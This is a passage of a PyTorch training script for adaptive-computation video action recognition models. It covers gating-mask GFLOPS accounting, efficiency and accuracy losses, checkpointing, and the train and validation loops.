map_record.update(mAP)\n mmap_record.update(mmAP)\n prec_record.update(prec1)\n prec5_record.update(prec5)\n if args.dataset == \"epic\":\n verb_prec1_record.update(epic_precs[0])\n verb_prec5_record.update(epic_precs[1])\n noun_prec1_record.update(epic_precs[2])\n noun_prec5_record.update(epic_precs[3])\n\n best_by = {\"map\": map_record, \"mmap\": mmap_record, \"acc\": prec_record}\n if best_by[args.choose_best_by].is_current_best():\n best_train_usage_str = train_usage_str if not args.skip_training else \"(Eval Mode)\"\n best_val_usage_str = val_usage_str\n\n epic_str = \"\"\n if args.dataset == \"epic\":\n epic_str = \"V@1:%.3f V@5:%.3f N@1:%.3f N@5:%.3f\" % (\n verb_prec1_record.best_val, verb_prec5_record.best_val,\n noun_prec1_record.best_val, noun_prec5_record.best_val\n )\n\n print('Best mAP: %.3f (epoch=%d)\\tBest mmAP: %.3f(epoch=%d)\\tBest Prec@1: %.3f (epoch=%d) w. Prec@5: %.3f %s' % (\n map_record.best_val, map_record.best_at,\n mmap_record.best_val, mmap_record.best_at,\n prec_record.best_val, prec_record.best_at,\n prec5_record.at(prec_record.best_at), epic_str\n ))\n\n if args.skip_training:\n break\n\n if args.rank==0:\n tf_writer.add_scalar('acc/test_top1_best', prec_record.best_val, epoch)\n saved_things = {\n 'epoch': epoch + 1,\n 'arch': args.arch,\n 'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'best_prec1': prec_record.best_val,\n 'prec5_at_best_prec1': prec5_record.at(prec_record.best_at),\n 'best_mmap': mmap_record.best_val,\n 'best_map': map_record.best_val,\n }\n\n save_checkpoint(saved_things, prec_record.is_current_best(), False, exp_full_path, \"ckpt.best\")\n save_checkpoint(saved_things, True, False, exp_full_path, \"ckpt.latest\")\n\n if epoch in args.backup_epoch_list:\n save_checkpoint(None, False, True, exp_full_path, str(epoch))\n\n torch.cuda.empty_cache()\n\n if args.distributed:\n dist.barrier()\n\n # after fininshing all the epochs\n if args.rank == 0:\n if test_mode:\n os.rename(logger._log_path, ospj(logger._log_dir_name, logger._log_file_name[:-4] +\n \"_mm_%.2f_a_%.2f_f.txt\" % (mmap_record.best_val, prec_record.best_val)))\n else:\n if args.ada_reso_skip:\n print(\"Best train usage:%s\\nBest val usage:%s\" % (best_train_usage_str, best_val_usage_str))\n\n\ndef set_random_seed(the_seed, args):\n if args.random_seed >= 0:\n np.random.seed(the_seed)\n torch.manual_seed(the_seed)\n\n\ndef init_gflops_table(model, args):\n if \"cgnet\" in args.arch:\n base_model_gflops = 1.8188 if \"net18\" in args.arch else 4.28\n params = get_gflops_params(args.arch, args.reso_list[0], args.num_class, -1, args=args)[1]\n else:\n base_model_gflops, params = get_gflops_params(args.arch, args.reso_list[0], args.num_class, -1, args=args)\n\n if args.ada_reso_skip:\n gflops_list = model.base_model.count_flops((1, 1, 3, args.reso_list[0], args.reso_list[0]))\n if \"AdaBNInc\" in args.arch:\n gflops_list, g_meta = gflops_list\n else:\n g_meta = None\n if args.rank==0:\n print(\"Network@%d (%.4f GFLOPS, %.4f M params) has %d blocks\" % (args.reso_list[0], base_model_gflops, params, len(gflops_list)))\n for i, block in enumerate(gflops_list):\n print(\"block\", i, \",\".join([\"%.4f GFLOPS\" % (x / 1e9) for x in block]))\n return base_model_gflops, gflops_list, g_meta\n else:\n if args.rank == 0:\n print(\"Network@%d (%.4f GFLOPS, %.4f M params)\" % (args.reso_list[0], base_model_gflops, params))\n return base_model_gflops, None, None\n\ndef compute_gflops_by_mask(mask_tensor_list, base_model_gflops, gflops_list, g_meta, args):\n # TODO: -> conv1 -> conv2 -> // inside the block\n # TODO: C0 - C1 - C2 // channels proc.\n # TODO: C1 = s0 + s1 + s2 // 0-zero out / 1-history / 2-current cheap <<< expensive\n # TODO: saving = s1/C1 * [FLOPS(conv1)] + s0/C1 * [FLOPS(conv1) + FLOPS(conv2)]\n upperbound_gflops = base_model_gflops\n real_gflops = base_model_gflops\n\n if \"bate\" in args.arch:\n for m_i, mask in enumerate(mask_tensor_list):\n #compute precise GFLOPS\n upsave = torch.zeros_like(mask[:, :, :, 0]) # B*T*C*K->B*T*C\n for t in range(mask.shape[1]-1):\n if args.gate_history:\n upsave[:, t] = (1 - mask[:, t, :, -1]) * (1 - mask[:, t + 1, :, -2])\n else:\n upsave[:, t] = 1 - mask[:, t, :, -1] # since no reusing, as long as not keeping, save from upstream conv\n upsave[:, -1] = 1 - mask[:, t, :, -1]\n upsave = torch.mean(upsave)\n\n if args.gate_no_skipping: # downstream conv gflops' saving is from skippings\n downsave = upsave * 0\n else:\n downsave = torch.mean(mask[:, :, :, 0])\n\n conv_offset = 0\n real_count = 1.\n if args.dense_in_block:\n layer_i = m_i // 2 # because we have twice masks as the #(blocks)\n if m_i % 2 == 1: # means we come to the second mask in the block\n if \"net50\" in args.arch or \"net101\" in args.arch: # because we have 3 convs in BottleNeck\n conv_offset = 1\n else: # because we can't compute flops saving among blocks (due to residual op), so we skip this (as this is the case only in BasicBlock)\n real_count = 0\n else:\n layer_i = m_i\n up_flops = gflops_list[layer_i][0 + conv_offset] / 1e9\n down_flops = gflops_list[layer_i][1 + conv_offset] * real_count / 1e9\n embed_conv_flops = gflops_list[layer_i][-1] * real_count / 1e9\n\n upperbound_gflops = upperbound_gflops - downsave * (down_flops - embed_conv_flops) # in worst case, we only compute saving from downstream conv\n real_gflops = real_gflops - upsave * up_flops - downsave * (down_flops - embed_conv_flops)\n elif \"AdaBNInc\" in args.arch:\n for m_i, mask in enumerate(mask_tensor_list):\n # print(\"m_i=\",m_i)\n upsave = torch.zeros_like(mask[:, :, :, 0]) # B*T*C*K->B*T*C\n for t in range(mask.shape[1]-1):\n if args.gate_history:\n upsave[:, t] = (1 - mask[:, t, :, -1]) * (1 - mask[:, t + 1, :, -2])\n else:\n upsave[:, t] = 1 - mask[:, t, :, -1] # since no reusing, as long as not keeping, save from upstream conv\n upsave[:, -1] = 1 - mask[:, t, :, -1]\n upsave = torch.mean(upsave, dim=[0,1]) # -> C\n\n # TODO 0->1 (dim 352)\n # TODO 2->3->4 (dim 320)\n # TODO maxpool (dim 224)\n\n # TODO 0 (dim 352)\n # TODO 1->2 (dim 320)\n # TODO 3->4->5 (dim 224)\n # TODO 6 (dim 128) total=1024\n if len(gflops_list[m_i]) == 7:\n _a,_b,_c,_d = g_meta[m_i]\n upsaves = [torch.mean(upsave[:_a]),\n torch.mean(upsave[_a:_a + _b]),\n torch.mean(upsave[_a + _b:_a + _b + _c]),\n torch.mean(upsave[_a + _b + _c:])]\n out_corr_list = [0, 2, 5, 6] # to the id of last convs in each partition\n if m_i < len(gflops_list)-1 and len(gflops_list[m_i+1]) == 5:\n next_in_corr_list = [0, 2]\n else:\n next_in_corr_list = [0, 1, 3, 6]\n # print(_a, _a + _b, _a+_b+_c, \"channel=\", upsave.shape)\n elif len(gflops_list[m_i]) == 5:\n _a, _b, _c= g_meta[m_i]\n # print(_a, _a+_b, \"channel=\", upsave.shape)\n upsaves = [torch.mean(upsave[:_a]),\n torch.mean(upsave[_a:_a+_b]),\n torch.mean(upsave[_a+_b:])]\n out_corr_list = [1, 4] # to the id of last convs in each partition\n next_in_corr_list = [0, 1, 3, 6]\n # print(\"upsaves\",[xx.item() for xx in upsaves])\n up_flops_save = sum([upsaves[f_i] * gflops_list[m_i][out_corr_list[f_i]] for f_i in range(len(out_corr_list))]) / 1e9\n # print(\"up_flops_save\", up_flops_save.item())\n if args.gate_no_skipping: # downstream conv gflops' saving is from skippings\n downsave = upsaves[0] * 0\n else:\n downsave = torch.mean(mask[:, :, :, 0])\n # print(\"downsave\", downsave.item())\n down_flops_save = up_flops_save * 0\n if m_i < len(mask_tensor_list)-1:\n # to the id of first convs in each partition in the next layer\n down_flops_save = downsave * sum([gflops_list[m_i+1][next_in_corr_list[f_i]] for f_i in range(len(next_in_corr_list))]) / 1e9\n # print(\"down_flops_save\", down_flops_save.item())\n upperbound_gflops = upperbound_gflops - down_flops_save\n real_gflops = real_gflops - up_flops_save - down_flops_save\n # print(upperbound_gflops.item(),real_gflops.item())\n else:\n # s0 for sparsity savings\n # s1 for history\n # print(mask_tensor_list)\n # for mask in mask_tensor_list:\n # print(torch.sum(mask[:, :, 1]), torch.sum(mask[:, :, 0]), torch.sum(mask[:, :, 1]) / torch.sum(mask[:, :, 0]))\n s0 = [1 - 1.0 * torch.sum(mask[:, :, 1]) / torch.sum(mask[:, :, 0]) for mask in mask_tensor_list]\n\n if args.dense_in_block:\n savings0 = sum([s0[i*2] * gflops_list[i][0] * (1 - 1.0 / args.partitions) for i in range(len(gflops_list))])\n savings1 = sum([s0[i*2+1] * gflops_list[i][1] * (1 - 1.0 / args.partitions) for i in range(len(gflops_list))])\n savings = savings0 + savings1\n else:\n savings = sum([s0[i] * gflops_list[i][0] * (1 - 1.0 / args.partitions) for i in range(len(gflops_list))])\n real_gflops = base_model_gflops - savings / 1e9\n upperbound_gflops = real_gflops\n\n return upperbound_gflops, real_gflops\n\n\ndef print_mask_statistics(mask_tensor_list, args):\n if \"cgnet\" in args.arch:\n cnt_ = [torch.sum(x, dim=[0, 1]) for x in mask_tensor_list] # sum up over t\n cnt_out = sum([x[0] for x in cnt_])\n cnt_full = sum([x[1] for x in cnt_])\n print(\"Overall sparsity: %.4f\"%(1-1.0*cnt_full/cnt_out))\n print(\"Full: \", \" \".join([\"%7.4f\" % (1.0*x[1]/1e9) for x in cnt_]))\n print(\"Total: \", \" \".join([\"%7.4f\" % (1.0*x[0]/1e9) for x in cnt_]))\n print(\"Ratio: \", \" \".join([\"%7.4f\" % (1-1.0*x[1]/x[0]) for x in cnt_]))\n print()\n else:\n # overall\n # t=overall, 0, mid, end\n # 1. sparsity (layerwise)\n # 2. variance (layerwise)\n if args.gate_history:\n if args.gate_no_skipping:\n dim_str = [\"hist\", \"curr\"]\n else:\n dim_str = [\"save\", \"hist\", \"curr\"]\n else:\n dim_str = [\"save\", \"curr\"]\n\n print(\"Overall:\")\n\n normalized_tensor_list=[]\n for mask in mask_tensor_list:\n normalized_tensor_list.append(f.normalize(mask, dim=-1, p=1))\n\n for t_i in [None]: #[None, num_segments // 2]: # \"[None, 0, num_segments // 2, num_segments - 1]:\n t_start = t_i if t_i is not None else 0\n t_end = t_i + 1 if t_i is not None else mask_tensor_list[0].shape[0]\n for dim_i in range(len(dim_str)):\n s_list = []\n\n layer_i_list = [iii for iii in range(len(mask_tensor_list))]\n cap_length = args.cap_length\n if len(mask_tensor_list) > cap_length:\n layer_i_list = [int(iii) for iii in np.linspace(0, len(mask_tensor_list)-1, cap_length, endpoint=True)]\n\n for layer_i in layer_i_list:\n s_list.append(torch.mean(normalized_tensor_list[layer_i][t_start:t_end, :, dim_i]))\n # d_list.append(\n # torch.std(torch.mean(mask_tensor_list[layer_i][t_start:t_end, :, dim_i], dim=-1), unbiased=True))\n # TODO channel-wise fire percentage for instances\n # TODO this can be a channel percentage histogram, ranged from 0~1, where we only count five buckets\n # TODO (0.00~0.20) (0.20~0.40) (0.40~0.60) (0.60~0.80) (0.80~1.00)\n # percentage = torch.mean(mask_tensor_list[layer_i][t_start:t_end, :, dim_i], dim=[0])\n # p_list.append(torch.histc(percentage, bins=5, min=0, max=1) / percentage.shape[0])\n t = \"%3d\" % t_i if t_i is not None else \"all\"\n print(\"(t=%s, %s)usage: \" % (t, dim_str[dim_i]),\n \" \".join([\"%.4f \" % (s) for s in s_list]))\n # print(\" \",\n # \" \".join([\"(\" + (\",\".join([\"%02d\" % (min(99, x * 100)) for x in p])) + \")\" for p in p_list]))\n print()\n\n # if args.dense_in_block:\n # stat_skip0 = 0\n # stat_reuse0 = 0\n # stat_keep0 = 0\n # stat_skip1 = 0\n # stat_reuse1 = 0\n # stat_keep1 = 0\n # for layer_i, mask in enumerate(mask_tensor_list):\n # if layer_i % 2 == 0:\n # if not args.gate_no_skipping:\n # stat_skip0 += torch.sum(mask[:, :, :, 0]).item()\n # if args.gate_history:\n # stat_reuse0 += torch.sum(mask[:, :, :, -2]).item()\n # stat_keep0 += torch.sum(mask[:, :, :, -1]).item()\n # else:\n # if not args.gate_no_skipping:\n # stat_skip1 += torch.sum(mask[:, :, :, 0]).item()\n # if args.gate_history:\n # stat_reuse1 += torch.sum(mask[:, :, :, -2]).item()\n # stat_keep1 += torch.sum(mask[:, :, :, -1]).item()\n # stat_total0 = stat_skip0 + stat_reuse0 + stat_keep0\n # stat_total1 = stat_skip1 + stat_reuse1 + stat_keep1\n # print(\"(=0)\\nskip : %.4f reuse: %.4f keep : %.4f\"\n # % (stat_skip0 / stat_total0, stat_reuse0 / stat_total0, stat_keep0 / stat_total0))\n #\n # print(\"(=1)\\nskip : %.4f reuse: %.4f keep : %.4f\"\n # % (stat_skip1 / stat_total1, stat_reuse1 / stat_total1, stat_keep1 / stat_total1))\n\n # stat_skip = 0\n # stat_reuse = 0\n # stat_keep = 0\n # for mask in mask_tensor_list:\n # if not args.gate_no_skipping:\n # stat_skip += torch.sum(mask[:, :, 0]).item()\n # if args.gate_history:\n # stat_reuse += torch.sum(mask[:, :, -2]).item()\n # stat_keep += torch.sum(mask[:, :, -1]).item()\n #\n # stat_total = stat_skip + stat_reuse + stat_keep\n\n stat_skip, stat_reuse, stat_keep, stat_total = get_mask_usage(mask_tensor_list, args)\n\n print(\"(overall)\\nskip : %.4f reuse: %.4f keep : %.4f\\n\"\n % (stat_skip/stat_total, stat_reuse/stat_total, stat_keep/stat_total))\n\n\n\ndef reverse_onehot(a):\n try:\n return np.array([np.where(r > 0.5)[0][0] for r in a])\n except Exception as e:\n print(\"error stack:\", e)\n print(a)\n for i, r in enumerate(a):\n print(i, r)\n return None\n\ndef get_mask_usage(mask_tensor_list, args):\n stat_skip = 0\n stat_reuse = 0\n stat_keep = 0\n for mask in mask_tensor_list:\n if not args.gate_no_skipping:\n stat_skip += torch.sum(mask[:, :, 0])\n if args.gate_history:\n stat_reuse += torch.sum(mask[:, :, -2])\n stat_keep += torch.sum(mask[:, :, -1])\n\n stat_total = stat_skip + stat_reuse + stat_keep\n return stat_skip, stat_reuse, stat_keep, stat_total\n\ndef compute_epic_losses(criterion, prediction, target, a_v_m, a_n_m):\n v_pred = get_marginal_output(prediction, a_v_m, 125)\n n_pred = get_marginal_output(prediction, a_n_m, 352)\n v_acc_loss = criterion(v_pred, target[:, 1])\n n_acc_loss = criterion(n_pred, target[:, 2])\n acc_loss = v_acc_loss + n_acc_loss\n return v_acc_loss, n_acc_loss, acc_loss\n\ndef compute_losses(criterion, prediction, target, mask_stack_list, upb_gflops_tensor, real_gflops_tensor, epoch_i, model,\n a_v_m, a_n_m, base_model_gflops, args):\n loss_dict={}\n if args.gflops_loss_type == \"real\":\n gflops_tensor = real_gflops_tensor\n else:\n gflops_tensor = upb_gflops_tensor\n\n # linear efficiency loss scheduling\n if args.gate_linear_phase > 0:\n factor = 1. / args.gate_linear_phase * min(args.gate_linear_phase, epoch_i)\n else:\n factor = 1.\n\n if epoch_i < args.gate_loss_starts_from:\n factor = 0.\n\n # accuracy loss\n if args.dataset == \"epic\": # combined_verb/noun_losses\n v_acc_loss, n_acc_loss, acc_loss = compute_epic_losses(criterion, prediction, target, a_v_m, a_n_m)\n loss_dict[\"verb_loss\"] = v_acc_loss\n loss_dict[\"noun_loss\"] = n_acc_loss\n else:\n acc_loss = criterion(prediction, target[:, 0])\n loss_dict[\"acc_loss\"] = acc_loss\n\n loss_dict[\"eff_loss\"] = acc_loss * 0\n # gflops loss\n gflops_loss = acc_loss * 0\n if args.gate_gflops_loss_weight > 0 and epoch_i > args.eff_loss_after:\n if args.gflops_loss_norm == 1:\n gflops_loss = torch.abs(gflops_tensor - args.gate_gflops_bias) * args.gate_gflops_loss_weight * factor\n elif args.gflops_loss_norm == 2:\n gflops_loss = ((gflops_tensor/base_model_gflops - args.gate_gflops_threshold)**2) * args.gate_gflops_loss_weight * factor\n loss_dict[\"gflops_loss\"] = gflops_loss\n loss_dict[\"eff_loss\"] += gflops_loss\n\n # regularizer loss\n regu_loss = acc_loss * 0\n if args.keep_weight > 0 or args.reuse_weight>0 or args.skip_weight>0:\n stat_skip, stat_reuse, stat_keep, stat_total = get_mask_usage(mask_stack_list, args)\n regu_loss += args.skip_weight * (((stat_skip / stat_total - args.skip_ratio) / args.skip_ratio) ** 2)\n regu_loss += args.reuse_weight * (((stat_reuse / stat_total - args.reuse_ratio) / args.reuse_ratio) ** 2)\n regu_loss += args.keep_weight * (((stat_keep / stat_total - args.keep_ratio) / args.keep_ratio) ** 2)\n loss_dict[\"regu_loss\"] = regu_loss\n loss_dict[\"eff_loss\"] += regu_loss\n\n # threshold loss for cgnet\n thres_loss = acc_loss * 0\n if \"cgnet\" in args.arch:\n for name, param in model.named_parameters():\n if 'threshold' in name:\n # print(param)\n thres_loss += args.threshold_loss_weight * torch.sum((param-args.gtarget) ** 2)\n loss_dict[\"thres_loss\"] = thres_loss\n loss_dict[\"eff_loss\"] += thres_loss\n loss = acc_loss + gflops_loss + thres_loss\n loss_dict[\"loss\"] = loss\n\n return loss_dict\n # if args.dataset == \"epic\":\n # return {\n # \"loss\": loss,\n # \"verb_loss\": v_acc_loss,\n # \"noun_loss\": n_acc_loss,\n # \"eff_loss\": loss - acc_loss,\n # \"regu_loss\": loss - acc_loss,\n # \"gflops_loss\": gflops_loss,\n # \"thres_loss\": thres_loss,\n # }\n #\n # else:\n # return {\n # \"loss\": loss,\n # \"acc_loss\": acc_loss,\n # \"eff_loss\": loss - acc_loss,\n # \"gflops_loss\": gflops_loss,\n # \"thres_loss\": thres_loss,\n # }\n\ndef elastic_list_print(l, limit=8):\n if isinstance(l, str):\n return l\n limit = min(limit, len(l))\n l_output = \"[%s,\" % (\",\".join([str(x) for x in l[:limit // 2]]))\n if l.shape[0] > limit:\n l_output += \"...\"\n l_output += \"%s]\" % (\",\".join([str(x) for x in l[-limit // 2:]]))\n return l_output\n\n\ndef compute_exp_decay_tau(epoch, args):\n return args.init_tau * np.exp(args.exp_decay_factor * epoch)\n\n\ndef get_policy_usage_str(upb_gflops, real_gflops):\n return \"Equivalent GFLOPS: upb: %.4f real: %.4f\" % (upb_gflops.item(), real_gflops.item())\n\n\ndef get_current_temperature(num_epoch, args):\n if args.exp_decay:\n tau = compute_exp_decay_tau(num_epoch, args)\n else:\n tau = args.init_tau\n return tau\n\n\ndef get_recorders(number):\n return [Recorder() for _ in range(number)]\n\n\ndef get_average_meters(number):\n return [AverageMeter() for _ in range(number)]\n\n\ndef train(train_loader, model, criterion, optimizer, epoch, base_model_gflops, gflops_list, g_meta, args, tf_writer):\n batch_time, data_time, top1, top5 = get_average_meters(4)\n if args.dataset==\"epic\":\n verb_top1, verb_top5, noun_top1, noun_top5 = get_average_meters(4)\n losses_dict = {}\n if args.ada_reso_skip:\n\n if \"batenet\" in args.arch:\n mask_stack_list_list = [0 for _ in gflops_list] + [0 for _ in gflops_list] if args.dense_in_block else [0 for\n _ in\n gflops_list]\n elif \"AdaBNInc\" in args.arch:\n mask_stack_list_list = [0 for _ in gflops_list] + [0 for _ in gflops_list] if args.dense_in_block else [0\n for\n _ in\n gflops_list]\n else:\n mask_stack_list_list = [[] for _ in gflops_list] + [[] for _ in gflops_list] if args.dense_in_block else [[] for _ in gflops_list]\n upb_batch_gflops_list=[]\n real_batch_gflops_list=[]\n\n tau = get_current_temperature(epoch, args)\n\n # switch to train mode\n model.module.partialBN(not args.no_partialbn)\n model.train()\n\n end = time.time()\n if args.rank==0:\n print(\"#%s# lr:%.6f\\ttau:%.4f\" % (args.exp_header, optimizer.param_groups[-1]['lr'] * 0.1, tau))\n\n if dist.is_initialized():\n train_loader.sampler.set_epoch(epoch)\n\n for i, input_tuple in enumerate(train_loader):\n data_time.update(time.time() - end)\n if args.warmup_epochs > 0:\n adjust_learning_rate(optimizer, epoch, len(train_loader), i, \"linear\", None, args)\n\n # input and target\n batchsize = input_tuple[0].size(0)\n # if args.gpus is not None:\n # input_var_list = [torch.autograd.Variable(input_item).cuda(args.gpus, non_blocking=True) for input_item in input_tuple[:-1]]\n # target = input_tuple[-1].cuda(args.gpus, non_blocking=True)\n # else:\n input_var_list = [torch.autograd.Variable(input_item).cuda(non_blocking=True) for input_item in\n input_tuple[:-1]]\n target = input_tuple[-1].cuda(non_blocking=True)\n\n target_var = torch.autograd.Variable(target)\n\n # model forward function & measure losses and accuracy\n output, mask_stack_list, _, _ = \\\n model(input=input_var_list, tau=tau, is_training=True, curr_step=epoch * len(train_loader) + i)\n\n if args.ada_reso_skip:\n # for m_i in range(len(mask_stack_list)):\n # mask_stack_list[m_i] = torch.sum(mask_stack_list[m_i], dim=0)\n # mask_stack_list[m_i] = f.normalize(mask_stack_list[m_i], dim=-1, p=1)\n upb_gflops_tensor, real_gflops_tensor = compute_gflops_by_mask(mask_stack_list, base_model_gflops, gflops_list, g_meta, args)\n loss_dict = compute_losses(criterion, output, target_var, mask_stack_list,\n upb_gflops_tensor, real_gflops_tensor, epoch, model,\n train_loader.a_v_m, train_loader.a_n_m, base_model_gflops, args)\n upb_batch_gflops_list.append(upb_gflops_tensor.detach())\n real_batch_gflops_list.append(real_gflops_tensor.detach())\n else:\n if args.dataset == \"epic\":\n v_acc_loss, n_acc_loss, acc_loss = compute_epic_losses(criterion, output, target_var,\n train_loader.a_v_m, train_loader.a_n_m)\n loss_dict = {\"loss\": acc_loss, \"verb_loss\": v_acc_loss, \"noun_loss\": n_acc_loss}\n else:\n loss_dict = {\"loss\": criterion(output, target_var[:, 0])}\n prec1, prec5 = accuracy(output.data, target[:, 0], topk=(1, 5))\n\n if args.dataset == \"epic\":\n verb_prec1, verb_prec5, noun_prec1, noun_prec5 = verb_noun_accuracy(\n train_loader.a_v_m, train_loader.a_n_m, output.data, target, topk=(1, 5))\n\n if dist.is_initialized():\n world_size = dist.get_world_size()\n dist.all_reduce(prec1)\n dist.all_reduce(prec5)\n prec1 /= world_size\n prec5 /= world_size\n if args.dataset == \"epic\":\n dist.all_reduce(verb_prec1)\n dist.all_reduce(verb_prec5)\n dist.all_reduce(noun_prec1)\n dist.all_reduce(noun_prec5)\n verb_prec1 /= world_size\n verb_prec5 /= world_size\n noun_prec1 /= world_size\n noun_prec5 /= world_size\n\n # record losses and accuracy\n if len(losses_dict)==0:\n losses_dict = {loss_name: get_average_meters(1)[0] for loss_name in loss_dict}\n for loss_name in loss_dict:\n losses_dict[loss_name].update(loss_dict[loss_name].item(), batchsize)\n top1.update(prec1.item(), batchsize)\n top5.update(prec5.item(), batchsize)\n if args.dataset == \"epic\":\n verb_top1.update(verb_prec1.item(), batchsize)\n verb_top5.update(verb_prec5.item(), batchsize)\n noun_top1.update(noun_prec1.item(), batchsize)\n noun_top5.update(noun_prec5.item(), batchsize)\n\n # from torch import autograd\n # with autograd.detect_anomaly():\n # compute gradient and do SGD step\n loss_dict[\"loss\"].backward()\n\n if args.clip_gradient is not None:\n clip_grad_norm_(model.parameters(), args.clip_gradient)\n optimizer.step()\n optimizer.zero_grad()\n\n # gather masks\n if args.ada_reso_skip:\n for layer_i, mask_stack in enumerate(mask_stack_list):\n if \"batenet\" in args.arch:\n mask_stack_list_list[layer_i] += torch.sum(mask_stack.detach(), dim=0)\n elif \"AdaBNInc\" in args.arch:\n mask_stack_list_list[layer_i] += torch.sum(mask_stack.detach(), dim=0)\n else: # TODO CGNet\n mask_stack_list_list[layer_i].append(mask_stack.detach()) #TODO removed cpu()\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n # logging\n if args.rank==0 and i % args.print_freq == 0:\n print_output = ('Epoch:[{0:02d}][{1:03d}/{2:03d}] lr {3:.6f} '\n 'Time {batch_time.val:.3f}({batch_time.avg:.3f}) '\n '{data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'Loss{loss.val:.4f}({loss.avg:.4f}) '\n 'Prec@1 {top1.val:.3f}({top1.avg:.3f}) '\n 'Prec@5 {top5.val:.3f}({top5.avg:.3f})\\t'.format(\n epoch, i, len(train_loader), optimizer.param_groups[-1]['lr'] * 0.1, batch_time=batch_time,\n data_time=data_time, loss=losses_dict[\"loss\"], top1=top1, top5=top5)) # TODO\n\n if args.dataset==\"epic\":\n print_output += \"V@1({v1.avg:.3f}) ({v5.avg:.3f}) \" \\\n \"N@1({n1.avg:.3f}) ({n5.avg:.3f}) \".\\\n format(v1=verb_top1, v5=verb_top5, n1=noun_top1, n5=noun_top5)\n\n for loss_name in losses_dict:\n if loss_name == \"loss\" or \"mask\" in loss_name:\n continue\n print_output += ' {header:s} ({loss.avg:.3f})'.\\\n format(header=loss_name[0], loss=losses_dict[loss_name])\n print(print_output)\n if args.ada_reso_skip:\n if \"cgnet\" in args.arch:\n for layer_i in range(len(mask_stack_list_list)):\n mask_stack_list_list[layer_i] = torch.cat(mask_stack_list_list[layer_i], dim=0)\n # upb_batch_gflops, real_batch_gflops = compute_gflops_by_mask(mask_stack_list_list, base_model_gflops, gflops_list, args)\n upb_batch_gflops= torch.mean(torch.stack(upb_batch_gflops_list))\n real_batch_gflops = torch.mean(torch.stack(real_batch_gflops_list))\n if dist.is_initialized():\n world_size = dist.get_world_size()\n dist.all_reduce(upb_batch_gflops)\n dist.all_reduce(real_batch_gflops)\n upb_batch_gflops /= world_size\n real_batch_gflops /= world_size\n\n if args.rank == 0:\n if args.ada_reso_skip:\n usage_str = get_policy_usage_str(upb_batch_gflops, real_batch_gflops)\n print(usage_str)\n # if args.print_statistics:\n print_mask_statistics(mask_stack_list_list, args)\n else:\n usage_str = \"Base Model\"\n if tf_writer is not None:\n tf_writer.add_scalar('loss/train', losses_dict[\"loss\"].avg, epoch)\n tf_writer.add_scalar('acc/train_top1', top1.avg, epoch)\n tf_writer.add_scalar('acc/train_top5', top5.avg, epoch)\n tf_writer.add_scalar('lr', optimizer.param_groups[-1]['lr'], epoch)\n else:\n usage_str = \"Empty (non-master nodes)\"\n return usage_str\n\n\ndef validate(val_loader, model, criterion, epoch, base_model_gflops, gflops_list, g_meta, exp_full_path, args, tf_writer=None):\n batch_time, top1, top5 = get_average_meters(3)\n if args.dataset==\"epic\":\n verb_top1, verb_top5, noun_top1, noun_top5 = get_average_meters(4)\n # TODO(yue)\n all_results = []\n all_targets = []\n\n if args.save_meta_gate:\n gate_meta_list = []\n mask_stat_list = [[] for _ in gflops_list] # []\n if args.save_meta:\n record_path_list = []\n indices_list = []\n\n tau = get_current_temperature(epoch, args)\n\n if args.ada_reso_skip:\n if \"batenet\" in args.arch:\n mask_stack_list_list = [0 for _ in gflops_list] + [0 for _ in gflops_list] if args.dense_in_block else [0 for\n _ in\n gflops_list]\n elif \"AdaBNInc\" in args.arch:\n mask_stack_list_list = [0 for _ in gflops_list] + [0 for _ in gflops_list] if args.dense_in_block else [0\n for\n _ in\n gflops_list]\n else:\n mask_stack_list_list = [[] for _ in gflops_list] + [[] for _ in gflops_list] if args.dense_in_block else [[] for _ in gflops_list]\n upb_batch_gflops_list = []\n real_batch_gflops_list = []\n\n losses_dict={}\n\n # switch to evaluate mode\n model.eval()\n\n end = time.time()\n with torch.no_grad():\n for i, input_tuple in enumerate(val_loader):\n # input and target\n batchsize = input_tuple[0].size(0)\n # if args.gpus is not None:\n # input_tuple = [x.cuda(args.gpus, non_blocking=True) for x in input_tuple]\n # else:\n input_data = input_tuple[0].cuda(non_blocking=True)\n # input_tuple = [x.cuda(non_blocking=True) for x in input_tuple]\n target = input_tuple[-1].cuda(non_blocking=True)\n # target = input_tuple[-1].cuda(args.gpus, non_blocking=True)\n if args.save_meta:\n for save_i in range(batchsize):\n record_path_list.append(input_tuple[1][save_i])\n indices_list.append(torch.tensor(input_tuple[2][save_i]))\n\n # model forward function\n output, mask_stack_list, _, gate_meta = \\\n model(input=[input_data], tau=tau, is_training=False, curr_step=0)\n\n # measure losses, accuracy and predictions\n if args.ada_reso_skip:\n upb_gflops_tensor, real_gflops_tensor = compute_gflops_by_mask(mask_stack_list, base_model_gflops, gflops_list, g_meta, args)\n loss_dict = compute_losses(criterion, output, target, mask_stack_list,\n upb_gflops_tensor, real_gflops_tensor, epoch, model,\n val_loader.a_v_m, val_loader.a_n_m, base_model_gflops, args)\n upb_batch_gflops_list.append(upb_gflops_tensor)\n real_batch_gflops_list.append(real_gflops_tensor)\n else:\n if args.dataset==\"epic\":\n v_acc_loss, n_acc_loss, acc_loss = compute_epic_losses(criterion, output, target,\n val_loader.a_v_m, val_loader.a_n_m)\n loss_dict = {\"loss\": acc_loss, \"verb_loss\": v_acc_loss, \"noun_loss\": n_acc_loss}\n else:\n loss_dict = {\"loss\": criterion(output, target[:, 0])}\n\n prec1, prec5 = accuracy(output.data, target[:, 0], topk=(1, 5))\n\n if args.dataset == \"epic\":\n verb_prec1, verb_prec5, noun_prec1, noun_prec5 = verb_noun_accuracy(\n val_loader.a_v_m, val_loader.a_n_m, output.data, target, topk=(1, 5))\n\n if dist.is_initialized():\n world_size = dist.get_world_size()\n dist.all_reduce(prec1)\n dist.all_reduce(prec5)\n prec1 /= world_size\n prec5 /= world_size\n if args.dataset == \"epic\":\n dist.all_reduce(verb_prec1)\n dist.all_reduce(verb_prec5)\n dist.all_reduce(noun_prec1)\n dist.all_reduce(noun_prec5)\n verb_prec1 /= world_size\n verb_prec5 /= world_size\n noun_prec1 /= world_size\n noun_prec5 /= world_size\n\n all_results.append(output)\n all_targets.append(target)\n\n # record loss and accuracy\n if len(losses_dict) == 0:\n losses_dict = {loss_name: get_average_meters(1)[0] for loss_name in loss_dict}\n for loss_name in loss_dict:\n losses_dict[loss_name].update(loss_dict[loss_name].item(), batchsize)\n top1.update(prec1.item(), batchsize)\n top5.update(prec5.item(), batchsize)\n if args.dataset == \"epic\":\n 